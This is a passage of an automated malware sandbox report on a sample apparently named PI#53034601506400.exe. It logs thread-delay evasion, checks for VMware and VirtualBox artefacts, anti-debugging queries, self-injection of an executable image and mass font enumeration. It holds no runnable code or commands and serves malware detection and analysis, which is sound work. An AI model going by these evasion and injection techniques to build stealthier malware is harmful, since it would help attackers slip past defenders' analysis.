              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -234777s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -234657s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -234530s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -234418s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -234281s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -234172s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -234063s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -233953s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -233844s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -233688s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6068 | Thread sleep time: -41226s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 6120 | Thread sleep time: -233547s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | TID: 5040 | Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Last function: Thread delayed
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 240000
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239871
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239766
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239639
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239532
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239391
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239281
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239164
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238958
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238797
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238619
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238500
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238359
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238218
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238106
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237991
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237842
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237688
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237561
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237427
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237297
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237116
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236984
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236841
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236688
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236537
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236391
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236249
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236141
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236000
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235887
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235766
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235641
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235513
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235391
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235250
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235138
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235028
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234905
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234777
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234657
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234530
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234418
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234281
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234172
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234063
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 233953
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 233844
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 233688
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 233547
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Window / User API: threadDelayed 9142
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 240000
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239871
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239766
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239639
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239532
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239391
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239281
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 239164
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238958
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238797
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238619
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238500
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238359
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238218
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 238106
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237991
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237842
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237688
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237561
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237427
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237297
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 237116
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236984
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236841
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236688
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236537
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236391
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236249
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236141
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 236000
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235887
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235766
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235641
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235513
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235391
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235250
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235138
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 235028
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234905
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234777
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234657
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234530
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234418
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234281
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234172
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 234063
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 233953
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 233844
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 233688
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 41226
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 233547
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Thread delayed: delay time: 60000
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VBOXDSOFTWARE\VMware, Inc.\VMware Tools
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\TSOFTWARE\Oracle\VirtualBox Guest AdditionsNSYSTEM\ControlSet001\Services\Disk\Enum
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Memory written: C:\Users\user\Desktop\PI#53034601506400.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Process created: C:\Users\user\Desktop\PI#53034601506400.exe C:\Users\user\Desktop\PI#53034601506400.exe
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Users\user\Desktop\PI#53034601506400.exe VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
